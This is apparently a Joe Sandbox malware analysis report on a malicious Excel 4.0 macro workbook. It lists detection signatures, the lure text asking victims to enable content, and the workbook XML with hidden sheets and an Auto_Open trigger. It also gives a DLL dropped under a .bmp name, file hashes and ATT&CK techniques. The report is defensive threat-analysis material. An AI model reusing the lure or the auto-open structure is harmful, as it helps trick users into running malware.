Loading ...

Play interactive tourEdit tour

Analysis Report 4468873941_759979693.xlsm

Overview

General Information

Sample Name:4468873941_759979693.xlsm
Analysis ID:412575
MD5:b5021bc6cc8e2fc2231978d6c9118f2a
SHA1:c11430e1206f25bf768f1643f51bed8a4a1eec9d
SHA256:5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected MalDoc1
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
PE file contains strange resources
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: B5D11EA.bmp.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: B5D11EA.bmp.0.drJump to dropped file

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96A6E04D.jpegJump to behavior

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 17 Once you have enabled editing, please click En
    Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 18 :: 21 22 23 24 25 26 27 28 29 30 31
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: 4468873941_759979693.xlsmInitial sample: EXEC
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmpJump to dropped file
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmp D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{121D364D-A553-4376-9A63-D54AB3450050}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="3" state="hidden" r:id="rId2"/><sheet name="Nolaert" sheetId="2" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Nolaert!$AK$7</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: B5D11EA.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow title found: microsoft excel okcannot run 'tar.exe'. the program or one of its components is damaged or missing.
    Source: classification engineClassification label: mal72.troj.expl.evad.winXLSM@1/9@0/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$4468873941_759979693.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF11.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: B5D11EA.bmp.0.dr
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmpJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmpJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: B5D11EA.bmp.0.drBinary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
    Source: B5D11EA.bmp.0.drBinary or memory string: INTERNALNAMESNIFFER.EXE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmpJump to dropped file

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading11OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmp0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:412575
    Start date:12.05.2021
    Start time:19:33:01
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 13m 38s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:4468873941_759979693.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:3
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.troj.expl.evad.winXLSM@1/9@0/0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Max analysis timeout: 720s exceeded, the analysis took too long

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmpf9309eba_by_Libranalysis.xlsxGet hashmaliciousBrowse
      f9309eba_by_Libranalysis.xlsxGet hashmaliciousBrowse

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96A6E04D.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:[TIFF image data, big-endian, direntries=9, software=Adobe Photoshop 22.0 (Windows), datetime=2021:03:02 23:57:02], baseline, precision 8, 1600x1600, frames 3
        Category:dropped
        Size (bytes):185386
        Entropy (8bit):7.326521161282199
        Encrypted:false
        SSDEEP:3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8
        MD5:A6E3680B30CEC6746291E55B7D9B6975
        SHA1:E45C3A057F840EF4C96AB8233E1E21700BBDA199
        SHA-256:89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261
        SHA-512:FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B
        Malicious:false
        Reputation:low
        Preview: ......JFIF.....`.`.....NExif..MM.*.......1...........2..................................Q...........Q...........Q...........i.....................z....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5D11EA.bmp
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):647168
        Entropy (8bit):6.903949816811106
        Encrypted:false
        SSDEEP:12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA
        MD5:C77E025AB5500D3A00B86265C73CC0B3
        SHA1:83B5715406E67F33E0030C2F17991A4D4BE2CBE5
        SHA-256:D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803
        SHA-512:BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Joe Sandbox View:
        • Filename: f9309eba_by_Libranalysis.xlsx, Detection: malicious, Browse
        • Filename: f9309eba_by_Libranalysis.xlsx, Detection: malicious, Browse
        Reputation:low
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........P.......................................................................................>..E...\!..........|........................4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Z...@...0...@..............@....rsrc...|............p..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Temp\07DE0000
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):609627
        Entropy (8bit):7.892547340909964
        Encrypted:false
        SSDEEP:12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq
        MD5:D6657AA638C3DF2BF427C21C278E328B
        SHA1:CEFF78E927887AAD7987AC84124346E53F38F2C3
        SHA-256:23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A
        SHA-512:693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B
        Malicious:false
        Reputation:low
        Preview: .U.n.0....?..........C....I?....k..e....7..+.....W.3;+......'.....E5c...Ie..~.Y~e.Fa...B...zq.e......-...........y..Y.`D...r/..h._.fW.q6..eL9.b..V.Q..fC.........j.L.u~....!....J.OV.d.n.R.H.<..S.. $v.....E..=.HV.;..<...^f....@..3"...U...`.<....J...&..n..AI(.D...!..F.g..K....$.N.%l..U..2........e_..a.H..v...?....Jr.:......TC.=...)7......;...b.j.O6.O:....>.Vn?]...#:d..I..=.....D.......<...#.....2......BT..v.f....t..).... .p.|.-........PK..........!.2..'....3.......[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4468873941_759979693.LNK
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Thu May 13 01:33:40 2021, atime=Thu May 13 01:33:40 2021, length=609627, window=hide
        Category:dropped
        Size (bytes):2138
        Entropy (8bit):4.493322303689225
        Encrypted:false
        SSDEEP:48:8K/XT0jFD2ohH0tQh2K/XT0jFD2ohH0tQ/:8K/XojFD2C0tQh2K/XojFD2C0tQ/
        MD5:C21BE05514D07B27D3EF61D140FC382B
        SHA1:8C047B383BD5B39989F20719AF63A2451A50209B
        SHA-256:4FC18FCA7B8D2BDAA7F6D6FB1BAD00BA37287048E13CDB1838610F1DDB504A2F
        SHA-512:F8317EDBCB611E4C1A39F913DECE1FA3179786D804DEB11751DCE96BFFE05AFD625133039425EA426C134DD39CF87D819C68D9EE907DCF323E72C2E2C1981411
        Malicious:false
        Reputation:low
        Preview: L..................F.... .......{..f..b.G...Q.b.G..[M...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.PE...R2. .446887~1.XLS..`.......Q.y.Q.y*...8.....................4.4.6.8.8.7.3.9.4.1._.7.5.9.9.7.9.6.9.3...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\4468873941_759979693.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.8.8.7.3.9.4.1._.7.5.9.9.7.9.6.9.3...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781.........
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 01:33:40 2021, atime=Thu May 13 01:33:40 2021, length=12288, window=hide
        Category:dropped
        Size (bytes):867
        Entropy (8bit):4.472696730816663
        Encrypted:false
        SSDEEP:12:85QZCcLgXg/XAlCPCHaXtB8XzB/qPX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9O:85xK/XTd6jgYe11CDv3qtrNru/
        MD5:B2CD84427A7343276563C7B2D120731B
        SHA1:70AD4C54B28C1000672AADBEE0B1D151CCFAE511
        SHA-256:542A74682ED4998B3ED2FC981EA9C34C460385D8FB6CCA7983EC28578821D0BC
        SHA-512:5AC5D4D32E28A121915AFF1132A2F947EF42833BC1815F5C8E95C9C54B7C89A41F8961FFB5C0D7526E374B4C23B51D91AECCA6D154B6BCCF41A71F42889306F9
        Malicious:false
        Reputation:low
        Preview: L..................F...........7G..f..b.G..f..b.G...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R5...Desktop.d......QK.X.R5.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):115
        Entropy (8bit):4.495660190158482
        Encrypted:false
        SSDEEP:3:oyBVomxWa7DOccLpS7fDOccLpSmxWa7DOccLpSv:djzCkCBCc
        MD5:A9FD717C784D3A26BA547741BB6304EE
        SHA1:63FB9EB70A5C91C2B1CE15B7384725835620929A
        SHA-256:7F77C3AC0D59D1431C42221F62F9AA99D68724A477F92FF396058F18FF320B11
        SHA-512:A60F9DD8104335863122E4A9EF9FF7FF4457AC49B72DA74B1C6991A0E7BCF31658ED0F4BA1B4BFD8747DB3CA2C408BC2002C3B2B2176B86B00BA2569AF020A4E
        Malicious:false
        Reputation:low
        Preview: Desktop.LNK=0..[misc]..4468873941_759979693.LNK=0..4468873941_759979693.LNK=0..[misc]..4468873941_759979693.LNK=0..
        C:\Users\user\Desktop\38DE0000
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):609627
        Entropy (8bit):7.892547340909964
        Encrypted:false
        SSDEEP:12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq
        MD5:D6657AA638C3DF2BF427C21C278E328B
        SHA1:CEFF78E927887AAD7987AC84124346E53F38F2C3
        SHA-256:23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A
        SHA-512:693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B
        Malicious:false
        Reputation:low
        Preview: .U.n.0....?..........C....I?....k..e....7..+.....W.3;+......'.....E5c...Ie..~.Y~e.Fa...B...zq.e......-...........y..Y.`D...r/..h._.fW.q6..eL9.b..V.Q..fC.........j.L.u~....!....J.OV.d.n.R.H.<..S.. $v.....E..=.HV.;..<...^f....@..3"...U...`.<....J...&..n..AI(.D...!..F.g..K....$.N.%l..U..2........e_..a.H..v...?....Jr.:......TC.=...)7......;...b.j.O6.O:....>.Vn?]...#:d..I..=.....D.......<...#.....2......BT..v.f....t..).... .p.|.-........PK..........!.2..'....3.......[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\Desktop\~$4468873941_759979693.xlsm
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Reputation:high, very likely benign file
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\user\Nioka.meposv
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):609627
        Entropy (8bit):7.892547340909964
        Encrypted:false
        SSDEEP:12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq
        MD5:D6657AA638C3DF2BF427C21C278E328B
        SHA1:CEFF78E927887AAD7987AC84124346E53F38F2C3
        SHA-256:23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A
        SHA-512:693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B
        Malicious:false
        Reputation:low
